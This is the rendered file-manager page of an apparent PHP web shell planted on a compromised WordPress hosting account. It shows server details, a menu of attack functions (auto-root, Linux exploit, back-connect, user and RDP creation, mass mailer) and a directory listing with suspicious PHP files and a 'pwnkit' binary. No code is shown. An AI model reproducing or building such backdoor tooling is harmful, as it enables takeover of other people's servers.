Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.55
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
empowernetkenyajuly2026 /
[ HOME SHELL ]
Name
Size
Permission
Action
.tmb
[ DIR ]
drwxrwxrwx
760093
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwx---r-x
wp-content
[ DIR ]
drwx---r-x
wp-includes
[ DIR ]
drwx---r-x
.htaccess.htaccess.tar.gz
373
B
-rw-r--r--
.htaccess.tar
6
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.mad-root.mad-root.tar.gz
122
B
-rw-r--r--
.mad-root.tar
7
KB
-rw-r--r--
.ovhconfig.ovhconfig.tar.gz
188
B
-rw-r--r--
.ovhconfig.tar
2
KB
-rw-r--r--
.tmb.tar.gz
133
B
-rw-r--r--
.tmb.zip
410
B
-rw-r--r--
0cb02.zip
1.16
KB
-rw-r--r--
1.txt.tar
3
KB
-rw-r--r--
1.txt.txt.tar.gz
132
B
-rw-r--r--
760093.tar
6
KB
-rw-r--r--
760093.tar.gz
250
B
-rw-r--r--
760093.zip
965
B
-rw-r--r--
ID3.tar
1.14
MB
-rw-r--r--
ID3.tar.gz
237.93
KB
-rw-r--r--
IXR.tar
38
KB
-rw-r--r--
IXR.tar.gz
7.05
KB
-rw-r--r--
IXR.zip
36.54
KB
-rw-r--r--
OAuth.php.php.tar.gz
1.44
KB
-rw-r--r--
OAuth.php.tar
5.5
KB
-rw-r--r--
README.txt.tar
6.5
KB
-rw-r--r--
README.txt.txt.tar.gz
1.81
KB
-rw-r--r--
README.txt__9a2a123.tar
6.5
KB
-rw-r--r--
README.txt__9a2a123.txt__9a2a1...
1.83
KB
-rw-r--r--
SimplePie.tar
799.5
KB
-rw-r--r--
SimplePie.tar.gz
123.36
KB
-rw-r--r--
abilities-api.php.php.tar.gz
7.44
KB
-rw-r--r--
abilities-api.php.tar
67
KB
-rw-r--r--
abilities-api.zip
60.43
KB
-rw-r--r--
about-rtl.css.css.tar.gz
5.11
KB
-rw-r--r--
about-rtl.css.tar
29.5
KB
-rw-r--r--
about.html.html.tar.gz
3.85
KB
-rw-r--r--
about.html.tar
19.5
KB
-rw-r--r--
about.php.php.tar.gz
133
B
-rw-r--r--
about.php.tar
4.5
KB
-rw-r--r--
actionlog.tar
37.5
KB
-rw-r--r--
actionlog.tar.gz
5.65
KB
-rw-r--r--
admin-ajax.php.php.tar.gz
0
B
-rw-r--r--
admin-ajax.php.tar
7
KB
-rw-r--r--
admin-menu-rtl.css.css.tar.gz
3.77
KB
-rw-r--r--
admin-menu-rtl.css.tar
20
KB
-rw-r--r--
admin.php.php.tar.gz
110
B
-rw-r--r--
admin.php.tar
9.5
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
adminer.php.php.tar.gz
122
B
-rw-r--r--
adminer.php.tar
4.5
KB
-rw-r--r--
ai-client.php.php.tar.gz
0
B
-rw-r--r--
ai-client.php.tar
4
KB
-rw-r--r--
alfacgiapi.tar
7
KB
-rw-r--r--
alfacgiapi.tar.gz
1.31
KB
-rw-r--r--
align-none.png.png.tar.gz
581
B
-rw-r--r--
align-none.png.tar
2
KB
-rw-r--r--
align-right.png.png.tar.gz
678
B
-rw-r--r--
align-right.png.tar
2
KB
-rw-r--r--
arrows.png.png.tar.gz
356
B
-rw-r--r--
arrows.png.tar
2
KB
-rw-r--r--
assets.zip
407.8
KB
-rw-r--r--
async-upload.php.php.tar.gz
2.29
KB
-rw-r--r--
async-upload.php.tar
7
KB
-rw-r--r--
atomlib.php.php.tar.gz
3.33
KB
-rw-r--r--
atomlib.php.tar
13.5
KB
-rw-r--r--
authentication.tar
49
KB
-rw-r--r--
authentication.tar.gz
0
B
-rw-r--r--
base.css.css.tar.gz
1.65
KB
-rw-r--r--
base.css.tar
6.5
KB
-rw-r--r--
block-bindings.zip
11.37
KB
-rw-r--r--
block-editor.php.php.tar.gz
6.68
KB
-rw-r--r--
block-editor.php.tar
30
KB
-rw-r--r--
block-patterns.tar
30.5
KB
-rw-r--r--
block-patterns.tar.gz
3.67
KB
-rw-r--r--
block-supports.tar
213.5
KB
-rw-r--r--
block-supports.tar.gz
42.29
KB
-rw-r--r--
blocks.php.php.tar.gz
25.12
KB
-rw-r--r--
blocks.php.tar
123
KB
-rw-r--r--
blocks.tar
2.22
MB
-rw-r--r--
blocks.tar.gz
276.13
KB
-rw-r--r--
blueversionx-black-logo.png.pn...
31.88
KB
-rw-r--r--
blueversionx-black-logo.png.ta...
36
KB
-rw-r--r--
bootstrap.php.php.tar.gz
816
B
-rw-r--r--
bootstrap.php.tar
3
KB
-rw-r--r--
bubble_bg.gif.gif.tar.gz
499
B
-rw-r--r--
bubble_bg.gif.tar
2
KB
-rw-r--r--
build.tar
2.08
MB
-rw-r--r--
build.tar.gz
539.46
KB
-rw-r--r--
cache.php.php.tar.gz
2.62
KB
-rw-r--r--
cache.php.tar
28
KB
-rw-r--r--
category-template.php.php.tar....
13
KB
-rw-r--r--
category-template.php.tar
57.5
KB
-rw-r--r--
category.php.php.tar.gz
3.59
KB
-rw-r--r--
category.php.tar
28
KB
-rw-r--r--
certificates.tar
227.5
KB
-rw-r--r--
certificates.tar.gz
105.6
KB
-rw-r--r--
chatblueversion.zip
468.78
KB
-rw-r--r--
class-ftp.php.php.tar.gz
6.49
KB
-rw-r--r--
class-ftp.php.tar
28.5
KB
-rw-r--r--
class-http.php.php.tar.gz
337
B
-rw-r--r--
class-http.php.tar
2
KB
-rw-r--r--
class-oembed.php.php.tar.gz
357
B
-rw-r--r--
class-oembed.php.tar
3
KB
-rw-r--r--
class-phpass.php.php.tar.gz
2.52
KB
-rw-r--r--
class-phpass.php.tar
8.5
KB
-rw-r--r--
class-requests.php.php.tar.gz
951
B
-rw-r--r--
class-requests.php.tar
4
KB
-rw-r--r--
class-simplepie.php.php.tar.gz
0
B
-rw-r--r--
class-simplepie.php.tar
3
KB
-rw-r--r--
class-smtp.php.php.tar.gz
340
B
-rw-r--r--
class-smtp.php.tar
3
KB
-rw-r--r--
class-snoopy.php.php.tar.gz
7.94
KB
-rw-r--r--
class-snoopy.php.tar
38.5
KB
-rw-r--r--
class-walker-category-dropdown...
1.16
KB
-rw-r--r--
class-walker-category-dropdown...
4
KB
-rw-r--r--
class-walker-category.php.php....
2.45
KB
-rw-r--r--
class-walker-category.php.tar
19
KB
-rw-r--r--
class-walker-comment.php.php.t...
3.27
KB
-rw-r--r--
class-walker-comment.php.tar
15.5
KB
-rw-r--r--
class-walker-page-dropdown.php...
1.2
KB
-rw-r--r--
class-walker-page-dropdown.php...
4.5
KB
-rw-r--r--
class-walker-page.php.php.tar....
2.11
KB
-rw-r--r--
class-walker-page.php.tar
9
KB
-rw-r--r--
class-wp-admin-bar.php.php.tar...
4.86
KB
-rw-r--r--
class-wp-admin-bar.php.tar
19
KB
-rw-r--r--
class-wp-block-bindings-regist...
2.18
KB
-rw-r--r--
class-wp-block-bindings-regist...
10
KB
-rw-r--r--
class-wp-block-bindings-source...
1.09
KB
-rw-r--r--
class-wp-block-bindings-source...
4.5
KB
-rw-r--r--
class-wp-block-metadata-regist...
3.36
KB
-rw-r--r--
class-wp-block-metadata-regist...
13.5
KB
-rw-r--r--
class-wp-block-parser-block.ph...
869
B
-rw-r--r--
class-wp-block-parser-block.ph...
4
KB
-rw-r--r--
class-wp-block-parser-frame.ph...
694
B
-rw-r--r--
class-wp-block-parser-frame.ph...
3.5
KB
-rw-r--r--
class-wp-block-parser.php.php....
3.42
KB
-rw-r--r--
class-wp-block-parser.php.tar
13
KB
-rw-r--r--
class-wp-block-patterns-regist...
2.7
KB
-rw-r--r--
class-wp-block-patterns-regist...
23
KB
-rw-r--r--
class-wp-block-processor.php.p...
16.6
KB
-rw-r--r--
class-wp-block-processor.php.t...
70
KB
-rw-r--r--
class-wp-block-styles-registry...
1.81
KB
-rw-r--r--
class-wp-block-styles-registry...
8
KB
-rw-r--r--
class-wp-block-supports.php.ph...
1.7
KB
-rw-r--r--
class-wp-block-supports.php.ta...
15
KB
-rw-r--r--
class-wp-block-template.php.ph...
705
B
-rw-r--r--
class-wp-block-template.php.ta...
3.5
KB
-rw-r--r--
class-wp-block.php.php.tar.gz
7.61
KB
-rw-r--r--
class-wp-block.php.tar
29.5
KB
-rw-r--r--
class-wp-comment.php.php.tar.g...
4.59
KB
-rw-r--r--
class-wp-comment.php.tar
28.5
KB
-rw-r--r--
class-wp-customize-section.php...
3.23
KB
-rw-r--r--
class-wp-customize-section.php...
12.5
KB
-rw-r--r--
class-wp-dependency.php.php.ta...
1.02
KB
-rw-r--r--
class-wp-dependency.php.tar
4.5
KB
-rw-r--r--
class-wp-feed-cache-transient....
4
KB
-rw-r--r--
class-wp-hook.php.php.tar.gz
0
B
-rw-r--r--
class-wp-hook.php.tar
19
KB
-rw-r--r--
class-wp-http-cookie.php.php.t...
2.53
KB
-rw-r--r--
class-wp-http-cookie.php.tar
9
KB
-rw-r--r--
class-wp-http-curl.php.php.tar...
3.75
KB
-rw-r--r--
class-wp-http-curl.php.tar
14.5
KB
-rw-r--r--
class-wp-http-encoding.php.php...
2.21
KB
-rw-r--r--
class-wp-http-encoding.php.tar
8.5
KB
-rw-r--r--
class-wp-http-ixr-client.php.p...
1.45
KB
-rw-r--r--
class-wp-http-ixr-client.php.t...
5
KB
-rw-r--r--
class-wp-http-proxy.php.php.ta...
2.01
KB
-rw-r--r--
class-wp-http-proxy.php.tar
7.5
KB
-rw-r--r--
class-wp-http-response.php.php...
0
B
-rw-r--r--
class-wp-http-response.php.tar
8
KB
-rw-r--r--
class-wp-icons-registry.php.ph...
2.57
KB
-rw-r--r--
class-wp-icons-registry.php.ta...
11.5
KB
-rw-r--r--
class-wp-image-editor-gd.php.p...
5.08
KB
-rw-r--r--
class-wp-image-editor-gd.php.t...
22
KB
-rw-r--r--
class-wp-image-editor.php.php....
4.82
KB
-rw-r--r--
class-wp-image-editor.php.tar
19
KB
-rw-r--r--
class-wp-list-util.php.php.tar...
2.26
KB
-rw-r--r--
class-wp-list-util.php.tar
9
KB
-rw-r--r--
class-wp-locale.php.php.tar.gz
3.46
KB
-rw-r--r--
class-wp-locale.php.tar
18
KB
-rw-r--r--
class-wp-matchesmapregex.php.p...
810
B
-rw-r--r--
class-wp-matchesmapregex.php.t...
3.5
KB
-rw-r--r--
class-wp-network-query.php.php...
4.88
KB
-rw-r--r--
class-wp-network-query.php.tar
21
KB
-rw-r--r--
class-wp-network.php.php.tar.g...
3.81
KB
-rw-r--r--
class-wp-network.php.tar
14
KB
-rw-r--r--
class-wp-oembed-controller.php...
2.19
KB
-rw-r--r--
class-wp-oembed-controller.php...
8.5
KB
-rw-r--r--
class-wp-post-type.php.php.tar...
0
B
-rw-r--r--
class-wp-post-type.php.tar
31.5
KB
-rw-r--r--
class-wp-post.php.php.tar.gz
1.78
KB
-rw-r--r--
class-wp-post.php.tar
17.5
KB
-rw-r--r--
class-wp-query.php.php.tar.gz
31.21
KB
-rw-r--r--
class-wp-query.php.tar
156
KB
-rw-r--r--
class-wp-recovery-mode-key-ser...
1.46
KB
-rw-r--r--
class-wp-recovery-mode-key-ser...
6.5
KB
-rw-r--r--
class-wp-recovery-mode.php.php...
3.21
KB
-rw-r--r--
class-wp-recovery-mode.php.tar
13
KB
-rw-r--r--
class-wp-role.php.php.tar.gz
0
B
-rw-r--r--
class-wp-role.php.tar
7
KB
-rw-r--r--
class-wp-roles.php.php.tar.gz
2.6
KB
-rw-r--r--
class-wp-roles.php.tar
20
KB
-rw-r--r--
class-wp-session-tokens.php.ph...
1.92
KB
-rw-r--r--
class-wp-session-tokens.php.ta...
9
KB
-rw-r--r--
class-wp-simplepie-file.php.ph...
1.51
KB
-rw-r--r--
class-wp-simplepie-file.php.ta...
9
KB
-rw-r--r--
class-wp-simplepie-sanitize-ks...
0
B
-rw-r--r--
class-wp-simplepie-sanitize-ks...
6
KB
-rw-r--r--
class-wp-site.php.php.tar.gz
2.21
KB
-rw-r--r--
class-wp-site.php.tar
9.5
KB
-rw-r--r--
class-wp-tax-query.php.php.tar...
5.18
KB
-rw-r--r--
class-wp-tax-query.php.tar
21
KB
-rw-r--r--
class-wp-term.php.php.tar.gz
1.87
KB
-rw-r--r--
class-wp-term.php.tar
13
KB
-rw-r--r--
class-wp-text-diff-renderer-ta...
4.77
KB
-rw-r--r--
class-wp-text-diff-renderer-ta...
20
KB
-rw-r--r--
class-wp-textdomain-registry.p...
2.99
KB
-rw-r--r--
class-wp-textdomain-registry.p...
12
KB
-rw-r--r--
class-wp-theme-json-data.php.p...
791
B
-rw-r--r--
class-wp-theme-json-data.php.t...
3.5
KB
-rw-r--r--
class-wp-theme-json-resolver.p...
8.43
KB
-rw-r--r--
class-wp-theme-json-resolver.p...
36.5
KB
-rw-r--r--
class-wp-theme.php.php.tar.gz
14.15
KB
-rw-r--r--
class-wp-theme.php.tar
66
KB
-rw-r--r--
class-wp-token-map.php.php.tar...
7.87
KB
-rw-r--r--
class-wp-token-map.php.tar
29.5
KB
-rw-r--r--
class-wp-url-pattern-prefixer....
1.71
KB
-rw-r--r--
class-wp-url-pattern-prefixer....
6.5
KB
-rw-r--r--
class-wp-user-query.php.php.ta...
9.26
KB
-rw-r--r--
class-wp-user-query.php.tar
44.5
KB
-rw-r--r--
class-wp-user-request.php.php....
769
B
-rw-r--r--
class-wp-user-request.php.tar
4
KB
-rw-r--r--
class-wp-walker.php.php.tar.gz
3.14
KB
-rw-r--r--
class-wp-walker.php.tar
14.5
KB
-rw-r--r--
class-wp-widget-factory.php.ph...
1.09
KB
-rw-r--r--
class-wp-widget-factory.php.ta...
9
KB
-rw-r--r--
class-wp-widget.php.php.tar.gz
4.45
KB
-rw-r--r--
class-wp-widget.php.tar
20
KB
-rw-r--r--
class-wp.php.php.tar.gz
7.29
KB
-rw-r--r--
class-wp.php.tar
27.5
KB
-rw-r--r--
class-wpdb.php.php.tar.gz
28.82
KB
-rw-r--r--
class-wpdb.php.tar
120.5
KB
-rw-r--r--
class.wp-dependencies.php.tar
2
KB
-rw-r--r--
class.wp-dependencies.php.wp-d...
0
B
-rw-r--r--
cli.tar
113.5
KB
-rw-r--r--
cli.tar.gz
13.69
KB
-rw-r--r--
code-editor.css.css.tar.gz
0
B
-rw-r--r--
code-editor.css.tar
3.5
KB
-rw-r--r--
coffee.zip
94.33
KB
-rw-r--r--
com_categories.tar
20
KB
-rw-r--r--
com_categories.tar.gz
3.93
KB
-rw-r--r--
com_contact.tar
275.5
KB
-rw-r--r--
com_contact.tar.gz
41.21
KB
-rw-r--r--
com_content.tar
358.5
KB
-rw-r--r--
com_content.tar.gz
54.65
KB
-rw-r--r--
com_media.zip
4.01
KB
-rw-r--r--
com_menus.zip
65.15
KB
-rw-r--r--
com_spsimpleportfolio.zip
72.11
KB
-rw-r--r--
comment-template.php.php.tar.g...
19.98
KB
-rw-r--r--
comment-template.php.tar
305.5
KB
-rw-r--r--
common.css.css.tar.gz
17.32
KB
-rw-r--r--
common.css.tar
81.5
KB
-rw-r--r--
compat.php.php.tar.gz
5.46
KB
-rw-r--r--
compat.php.tar
23.5
KB
-rw-r--r--
config.php.php.tar.gz
627
B
-rw-r--r--
config.php.tar
3
KB
-rw-r--r--
configuration.php__9a2a123.php...
1.2
KB
-rw-r--r--
configuration.php__9a2a123.tar
5.5
KB
-rw-r--r--
connectors.php.php.tar.gz
7.35
KB
-rw-r--r--
connectors.php.tar
34
KB
-rw-r--r--
contribute.php.php.tar.gz
0
B
-rw-r--r--
contribute.php.tar
2
KB
-rw-r--r--
cron.php.php.tar.gz
0
B
-rw-r--r--
cron.php.tar
47
KB
-rw-r--r--
css.tar
49.5
KB
-rw-r--r--
css.tar.gz
9.26
KB
-rw-r--r--
custom-background.php.php.tar....
374
B
-rw-r--r--
custom-background.php.tar
3
KB
-rw-r--r--
customize.zip
183.1
KB
-rw-r--r--
dadb6f4e.tar
24
KB
-rw-r--r--
dadb6f4e.tar.gz
7.51
KB
-rw-r--r--
dashboard.css.css.tar.gz
6.65
KB
-rw-r--r--
dashboard.css.tar
31.5
KB
-rw-r--r--
dashicons.eot.eot.tar.gz
31.92
KB
-rw-r--r--
dashicons.eot.tar
57
KB
-rw-r--r--
dashicons.ttf.tar
57
KB
-rw-r--r--
dashicons.ttf.ttf.tar.gz
31.85
KB
-rw-r--r--
default-filters.php.php.tar.gz
8.94
KB
-rw-r--r--
default-filters.php.tar
80
KB
-rw-r--r--
default-widgets.php.php.tar.gz
569
B
-rw-r--r--
default-widgets.php.tar
4
KB
-rw-r--r--
edit-form-blocks.php.php.tar.g...
5.35
KB
-rw-r--r--
edit-form-blocks.php.tar
33
KB
-rw-r--r--
edit-link-form.php.php.tar.gz
0
B
-rw-r--r--
edit-link-form.php.tar
29
KB
-rw-r--r--
edit-rtl.css.css.tar.gz
8.93
KB
-rw-r--r--
edit-rtl.css.tar
41
KB
-rw-r--r--
edit-tag-form.php.php.tar.gz
2.84
KB
-rw-r--r--
edit-tag-form.php.tar
12
KB
-rw-r--r--
edit-tags.php.php.tar.gz
5.85
KB
-rw-r--r--
edit-tags.php.tar
23.5
KB
-rw-r--r--
edit.php.php.tar.gz
5.56
KB
-rw-r--r--
edit.php.tar
21
KB
-rw-r--r--
embed-template.php.php.tar.gz
334
B
-rw-r--r--
embed-template.php.tar
2
KB
-rw-r--r--
embed.php.php.tar.gz
10.34
KB
-rw-r--r--
embed.php.tar
40
KB
-rw-r--r--
erase-personal-data.php.php.ta...
2.77
KB
-rw-r--r--
erase-personal-data.php.tar
9
KB
-rw-r--r--
error.php.php.tar.gz
631
B
-rw-r--r--
error.php.tar
2.5
KB
-rw-r--r--
es-ES.tar
422.5
KB
-rw-r--r--
es-ES.tar.gz
92.09
KB
-rw-r--r--
extensions.classmap.php.classm...
0
B
-rw-r--r--
extensions.classmap.php.tar
4
KB
-rw-r--r--
feed-atom.php.php.tar.gz
0
B
-rw-r--r--
feed-atom.php.tar
5
KB
-rw-r--r--
feed-rdf.php.php.tar.gz
0
B
-rw-r--r--
feed-rdf.php.tar
4.5
KB
-rw-r--r--
feed-rss2.php.php.tar.gz
0
B
-rw-r--r--
feed-rss2.php.tar
10
KB
-rw-r--r--
feed.php.php.tar.gz
6.53
KB
-rw-r--r--
feed.php.tar
26.5
KB
-rw-r--r--
fields.zip
93.31
KB
-rw-r--r--
file.php.php.tar.gz
24.83
KB
-rw-r--r--
file.php.tar
179
KB
-rw-r--r--
file2.php__9a2a123.php__9a2a12...
74.15
KB
-rw-r--r--
file2.php__9a2a123.tar
98
KB
-rw-r--r--
forms.min.css.min.css.tar.gz
6.8
KB
-rw-r--r--
forms.min.css.tar
32
KB
-rw-r--r--
freedom-1.svg.svg.tar.gz
525
B
-rw-r--r--
freedom-1.svg.tar
3
KB
-rw-r--r--
freedom-2.svg.svg.tar.gz
3.04
KB
-rw-r--r--
freedom-2.svg.tar
9.5
KB
-rw-r--r--
freedom-3.svg.svg.tar.gz
725
B
-rw-r--r--
freedom-3.svg.tar
3.5
KB
-rw-r--r--
freedom-4.svg.svg.tar.gz
1.33
KB
-rw-r--r--
freedom-4.svg.tar
5
KB
-rw-r--r--
freedoms.php.php.tar.gz
0
B
-rw-r--r--
freedoms.php.tar
6
KB
-rw-r--r--
functions.php.php.tar.gz
73.8
KB
-rw-r--r--
functions.php.tar
290.5
KB
-rw-r--r--
functions.wp-scripts.php.tar
16
KB
-rw-r--r--
functions.wp-scripts.php.wp-sc...
3.98
KB
-rw-r--r--
garbagecron.php.php.tar.gz
692
B
-rw-r--r--
garbagecron.php.tar
3
KB
-rw-r--r--
generic.png.png.tar.gz
900
B
-rw-r--r--
generic.png.tar
2.5
KB
-rw-r--r--
global-styles-and-settings.php...
5.56
KB
-rw-r--r--
global-styles-and-settings.php...
22.5
KB
-rw-r--r--
goods.php
173.77
KB
-rw-r--r--
goods.php.php.tar.gz
53.19
KB
-rw-r--r--
goods.php.tar
175.5
KB
-rw-r--r--
hikashopshipping.tar
497
KB
-rw-r--r--
hikashopshipping.tar.gz
83.06
KB
-rw-r--r--
htaccess.txt__9a2a123.tar
5
KB
-rw-r--r--
htaccess.txt__9a2a123.txt__9a2...
1.65
KB
-rw-r--r--
html.zip
5.4
KB
-rw-r--r--
icons32-2x.png.png.tar.gz
21.29
KB
-rw-r--r--
icons32-2x.png.tar
23
KB
-rw-r--r--
icons32-vs.png.png.tar.gz
7.98
KB
-rw-r--r--
icons32-vs.png.tar
9.5
KB
-rw-r--r--
ident.zip
1.84
MB
-rw-r--r--
import.legacy.php.legacy.php.t...
827
B
-rw-r--r--
import.legacy.php.tar
3
KB
-rw-r--r--
index.php
0
B
-rw-r--r--
index.php.php.tar.gz
6.16
KB
-rw-r--r--
index.php.tar
74.5
KB
-rw-r--r--
install-helper.php.php.tar.gz
1.98
KB
-rw-r--r--
install-helper.php.tar
8.5
KB
-rw-r--r--
install-rtl.css.css.tar.gz
2.21
KB
-rw-r--r--
install-rtl.css.tar
8
KB
-rw-r--r--
install.min.css.min.css.tar.gz
0
B
-rw-r--r--
install.min.css.tar
7
KB
-rw-r--r--
install.php.php.tar.gz
0
B
-rw-r--r--
install.php.tar
38
KB
-rw-r--r--
install.zip
7.66
KB
-rw-r--r--
jecdcxgg.php
143.87
KB
-rw-r--r--
jecdcxgg.php.php.tar.gz
42.57
KB
-rw-r--r--
jecdcxgg.php.tar
145.5
KB
-rw-r--r--
l10n-rtl.min.css.min.css.tar.g...
879
B
-rw-r--r--
l10n-rtl.min.css.tar
5
KB
-rw-r--r--
l10n.min.css.min.css.tar.gz
873
B
-rw-r--r--
l10n.min.css.tar
5
KB
-rw-r--r--
language.zip
119.3
KB
-rw-r--r--
layouts.tar
544
KB
-rw-r--r--
layouts.tar.gz
74.89
KB
-rw-r--r--
license.txt
19.44
KB
-rw----r--
license.txt.tar
21
KB
-rw-r--r--
license.txt.txt.tar.gz
7.24
KB
-rw-r--r--
link-manager.php.php.tar.gz
1.87
KB
-rw-r--r--
link-manager.php.tar
6
KB
-rw-r--r--
load-scripts.php.php.tar.gz
1.08
KB
-rw-r--r--
load-scripts.php.tar
4
KB
-rw-r--r--
loading.gif.gif.tar.gz
1.32
KB
-rw-r--r--
loading.gif.tar
3
KB
-rw-r--r--
local.zip
25.91
KB
-rw-r--r--
log.zip
82.18
KB
-rw-r--r--
logs.tar
110.5
KB
-rw-r--r--
logs.tar.gz
32.03
KB
-rw-r--r--
maint.tar
13
KB
-rw-r--r--
maint.tar.gz
3.47
KB
-rw-r--r--
maint.zip
9.05
KB
-rw-r--r--
media-action.zip
12.94
KB
-rw-r--r--
media-new.php.php.tar.gz
1.55
KB
-rw-r--r--
media-new.php.tar
5
KB
-rw-r--r--
media-rtl.css.css.tar.gz
0
B
-rw-r--r--
media-rtl.css.tar
30
KB
-rw-r--r--
media-rtl.min.css.min.css.tar....
5.04
KB
-rw-r--r--
media-rtl.min.css.tar
24
KB
-rw-r--r--
media-template.php.php.tar.gz
0
B
-rw-r--r--
media-template.php.tar
66
KB
-rw-r--r--
media-upload.php.php.tar.gz
1.51
KB
-rw-r--r--
media-upload.php.tar
10
KB
-rw-r--r--
media.php.php.tar.gz
0
B
-rw-r--r--
media.php.tar
2.5
KB
-rw-r--r--
midnight.zip
93.97
KB
-rw-r--r--
misc.php.php.tar.gz
11.87
KB
-rw-r--r--
misc.php.tar
47
KB
-rw-r--r--
mo.php.php.tar.gz
2.66
KB
-rw-r--r--
mo.php.tar
11
KB
-rw-r--r--
mod_articles_archive.zip
7.88
KB
-rw-r--r--
mod_articles_categories.zip
11.2
KB
-rw-r--r--
mod_articles_latest.tar
15
KB
-rw-r--r--
mod_articles_latest.tar.gz
0
B
-rw-r--r--
mod_articles_news.tar
26.5
KB
-rw-r--r--
mod_articles_news.tar.gz
4.78
KB
-rw-r--r--
mod_articles_popular.tar
16
KB
-rw-r--r--
mod_articles_popular.tar.gz
3.43
KB
-rw-r--r--
mod_breadcrumbs.php.php.tar.gz
452
B
-rw-r--r--
mod_breadcrumbs.php.tar
2.5
KB
-rw-r--r--
mod_breadcrumbs.zip
11.05
KB
-rw-r--r--
mod_k2_users.zip
24.78
KB
-rw-r--r--
moderation.php.php.tar.gz
300
B
-rw-r--r--
moderation.php.tar
2
KB
-rw-r--r--
modern.zip
93.18
KB
-rw-r--r--
modules.zip
1.6
MB
-rw-r--r--
ms-admin.php.php.tar.gz
0
B
-rw-r--r--
ms-admin.php.tar
2
KB
-rw-r--r--
ms-blogs.php.php.tar.gz
6.53
KB
-rw-r--r--
ms-blogs.php.tar
27.5
KB
-rw-r--r--
ms-default-filters.php.php.tar...
1.82
KB
-rw-r--r--
ms-default-filters.php.tar
8
KB
-rw-r--r--
ms-delete-site.php.php.tar.gz
1.99
KB
-rw-r--r--
ms-delete-site.php.tar
6.5
KB
-rw-r--r--
ms-files.php.php.tar.gz
0
B
-rw-r--r--
ms-files.php.tar
11.5
KB
-rw-r--r--
ms-network.php.php.tar.gz
1.46
KB
-rw-r--r--
ms-network.php.tar
5.5
KB
-rw-r--r--
ms-sites.php.php.tar.gz
0
B
-rw-r--r--
ms-sites.php.tar
3
KB
-rw-r--r--
ms-themes.php.php.tar.gz
271
B
-rw-r--r--
ms-themes.php.tar
2
KB
-rw-r--r--
ms-users.php.php.tar.gz
273
B
-rw-r--r--
ms-users.php.tar
2
KB
-rw-r--r--
mu-plugins.tar
7.5
KB
-rw-r--r--
mu-plugins.tar.gz
0
B
-rw-r--r--
mu-plugins.zip
5.14
KB
-rw-r--r--
nav-menu-template.php.php.tar....
6.25
KB
-rw-r--r--
nav-menu-template.php.tar
27
KB
-rw-r--r--
nav-menu.php.php.tar.gz
10.46
KB
-rw-r--r--
nav-menu.php.tar
49.5
KB
-rw-r--r--
nav-menus.css.css.tar.gz
0
B
-rw-r--r--
nav-menus.css.tar
19.5
KB
-rw-r--r--
nav-menus.min.css.min.css.tar....
3.64
KB
-rw-r--r--
nav-menus.min.css.tar
15.5
KB
-rw-r--r--
network.php.php.tar.gz
0
B
-rw-r--r--
network.php.tar
28
KB
-rw-r--r--
ninjascanner.zip
8.41
MB
-rw-r--r--
nl-NL.zip
305.44
KB
-rw-r--r--
noop.php.php.tar.gz
474
B
-rw-r--r--
noop.php.tar
3
KB
-rw-r--r--
option.php.php.tar.gz
18.66
KB
-rw-r--r--
option.php.tar
104.5
KB
-rw-r--r--
options-general.php.php.tar.gz
6.6
KB
-rw-r--r--
options-general.php.tar
24
KB
-rw-r--r--
options-head.php.php.tar.gz
493
B
-rw-r--r--
options-head.php.tar
5.5
KB
-rw-r--r--
options-media.php.php.tar.gz
2.06
KB
-rw-r--r--
options-media.php.tar
8
KB
-rw-r--r--
options-privacy.php.php.tar.gz
3.42
KB
-rw-r--r--
options-privacy.php.tar
12
KB
-rw-r--r--
options-reading.php.php.tar.gz
3.12
KB
-rw-r--r--
options-reading.php.tar
11.5
KB
-rw-r--r--
options-writing.php.php.tar.gz
3.04
KB
-rw-r--r--
options-writing.php.tar
21
KB
-rw-r--r--
pages.php.php.tar.gz
348
B
-rw-r--r--
pages.php.tar
2
KB
-rw-r--r--
particles.tar
254.5
KB
-rw-r--r--
particles.tar.gz
31.89
KB
-rw-r--r--
php-ai-client.tar
702.5
KB
-rw-r--r--
php-ai-client.tar.gz
102.71
KB
-rw-r--r--
php-encryption.tar
29
KB
-rw-r--r--
php-encryption.tar.gz
7.12
KB
-rw-r--r--
phpinfo.php.php.tar.gz
128
B
-rw-r--r--
phpinfo.php.tar
2
KB
-rw-r--r--
plans.php.php.tar.gz
1.01
KB
-rw-r--r--
plans.php.tar
3.5
KB
-rw-r--r--
plg_installer_packageinstaller...
23.24
KB
-rw-r--r--
plg_quickicon_akeebabackup.tar
7
KB
-rw-r--r--
plg_quickicon_akeebabackup.tar...
0
B
-rw-r--r--
plg_quickicon_overridecheck.ta...
16.5
KB
-rw-r--r--
plg_quickicon_overridecheck.ta...
3.84
KB
-rw-r--r--
plg_quickicon_privacycheck.zip
11.89
KB
-rw-r--r--
pluggable-deprecated.php.php.t...
1.99
KB
-rw-r--r--
pluggable-deprecated.php.tar
8
KB
-rw-r--r--
plugin-install.php.php.tar.gz
0
B
-rw-r--r--
plugin-install.php.tar
8.5
KB
-rw-r--r--
plugin.php.php.tar.gz
18.01
KB
-rw-r--r--
plugin.php.tar
93
KB
-rw-r--r--
plugins.php.php.tar.gz
7.42
KB
-rw-r--r--
plugins.php.tar
33
KB
-rw-r--r--
po.php.php.tar.gz
4.04
KB
-rw-r--r--
po.php.tar
16.5
KB
-rw-r--r--
post-formats.php.php.tar.gz
1.97
KB
-rw-r--r--
post-formats.php.tar
8.5
KB
-rw-r--r--
post-new.php.php.tar.gz
1.15
KB
-rw-r--r--
post-new.php.tar
4.5
KB
-rw-r--r--
post-template.php.php.tar.gz
16.15
KB
-rw-r--r--
post-template.php.tar
69.5
KB
-rw-r--r--
post.php.php.tar.gz
3.21
KB
-rw-r--r--
post.php.tar
12.5
KB
-rw-r--r--
privacy.php.php.tar.gz
1.08
KB
-rw-r--r--
privacy.php.tar
7
KB
-rw-r--r--
profile.php.php.tar.gz
0
B
-rw-r--r--
profile.php.tar
3
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
